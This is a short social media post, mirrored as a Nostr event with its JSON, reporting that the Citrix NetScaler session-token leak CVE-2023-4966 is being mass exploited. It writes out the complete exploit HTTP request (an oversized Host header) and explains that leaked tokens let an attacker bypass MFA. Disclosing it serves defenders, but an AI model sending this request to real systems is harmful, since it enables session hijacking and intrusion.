Interesting Citrix Netscaler bug being mass exploited in the wild for about a month.
This is the HTTP request:
GET /oauth/idp/.well-known/openid-configuration HTTP/1.1
Host: a <repeated 24812 times>
Connection: close
It replies with system memory, which includes session tokens that you can use it gain remote access, bypassing authentication including MFA. https://www.assetnote.io/resources/research/citrix-bleed-leaking-session-tokens-with-cve-2023-4966
Kevin Beaumont /
npub176…fkwlw
2023-10-25 18:42:14
Author Public Key
npub176rs4lx7gjqwepgg75psfpv7zjj3xz0lyj4n7rux93ftm390sars6fkwlwSeen on
wss://relay.noswhere.comPublished at
2023-10-25 18:42:14Event JSON
{
"id": "d1c3c04b3a87b06c7bb3471d0168dde0253b07cc5687455b1a89b690acfa5b3b",
"pubkey": "f6870afcde4480ec8508f50304859e14a51309ff24ab3f0f862c52bdc4af8747",
"created_at": 1698259334,
"kind": 1,
"tags": [
[
"proxy",
"https://cyberplace.social/users/GossiTheDog/statuses/111297123767566767",
"activitypub"
]
],
"content": "Interesting Citrix Netscaler bug being mass exploited in the wild for about a month. \n\nThis is the HTTP request: \n\nGET /oauth/idp/.well-known/openid-configuration HTTP/1.1\nHost: a \u003crepeated 24812 times\u003e\nConnection: close\n\nIt replies with system memory, which includes session tokens that you can use it gain remote access, bypassing authentication including MFA. https://www.assetnote.io/resources/research/citrix-bleed-leaking-session-tokens-with-cve-2023-4966",
"sig": "214fae46602d4c4fad8c0e69a5b4bd0a70ace68db2136c62b99ffb2500739ab96dba8794d9193aa046d9bdeedabe48330ae123058dd3117c7c28309939b72c8c"
}